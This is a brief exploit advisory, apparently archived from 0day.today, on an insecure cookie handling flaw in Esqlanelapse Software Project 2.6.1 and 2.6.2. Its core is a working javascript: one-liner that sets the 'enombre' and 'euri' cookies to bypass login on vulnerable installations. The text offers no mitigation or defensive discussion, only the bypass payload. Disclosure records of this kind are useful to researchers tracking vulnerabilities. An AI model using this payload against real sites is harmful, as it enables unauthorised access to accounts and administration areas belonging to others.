id: 3768
date: 09/25/2008
title: Esqlanelapse Software Project <= 2.6.2 Insecure Cookie Handling Vuln
author: ZoRLu
cves: 

====================================================================
Esqlanelapse Software Project <= 2.6.2 Insecure Cookie Handling Vuln
====================================================================


[~] Esqlanelapse Software Project
[~]
[~] version: 2.6.1  & 2.6.2
[~]
[~] Insecure Cookie Handling Vulnerability
[~]
[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=118575&package_id=129141&release_id=519061
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 26.09.2008
[~]
[~] -----------------------------------------------------------

Exploit:

javascript:document.cookie = "enombre=nombre; path=/"; document.cookie = "euri=visitor_uri; path=/";

[~]----------------------------------------------------------------------




#  0day.today [2023-03-26]  #